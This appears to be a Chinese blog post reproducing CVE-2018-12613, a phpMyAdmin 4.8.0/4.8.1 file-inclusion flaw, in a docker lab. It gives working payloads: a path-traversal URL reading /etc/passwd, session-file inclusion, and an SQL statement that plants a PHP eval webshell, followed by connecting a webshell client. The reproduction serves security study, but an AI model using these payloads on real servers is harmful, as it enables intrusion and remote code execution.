漏洞复现CVE2018-12613

漏洞描述

在4.8.2之前的phpMyAdmin 4.8.x中发现了⼀个问题,攻击者可以在其中包含(查看并可能执⾏)服务

器上的⽂件。该漏洞来⾃⻚⾯重定向和在phpMyAdmin中加载的部分代码,以及对列⼊⽩名单的⻚⾯的

不正确测试。除“ $ cfg [‘AllowArbitraryServer’] = true”情况(攻击者可以指定他/她已经控制的任何主

机,并在phpMyAdmin上执⾏任意代码)外,攻击者还必须经过身份验证。 [‘ServerDefault’] = 0“的情

况(绕过登录要求,并在没有任何身份验证的情况下运⾏易受攻击的代码)。

影响版本

phpMyAdmin 4.8.0 和4.8.1

启动环境

docker-compose up -d

出错的话把权限改满

chmod -R 755 phpmyadmin

192.168.10.128:8080

?target=sql.php?/../../../../../../../../../etc/passwd

利⽤session写⼊shell的⽅式进⾏getshell

执⾏sql语句

SELECT "<?php phpinfo();?>"

我们进⼊docker容器中,查看web服务器下的tmp⽂件,查看我们的session

cat查看session⽂件可以看到我们刚才查询的php代码

利⽤payload尝试包含session⽂件,出现phpinfo

/index.php?target=sql.php?/../../../../../../../../../tmp/sess_c87cc98234a0
0983ae583e33888ac29f

写⼊webshell

select "<?php file_put_contents('/var/www/html/cmd.php','<?php @eval($_POST
[pass]);?>')?>"

然后再次包含session⽂件

/index.php?target=sql.php?/../../../../../../../../../tmp/sess_c87cc98234a0
0983ae583e33888ac29f

访问cmd.php

连接蚁剑

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值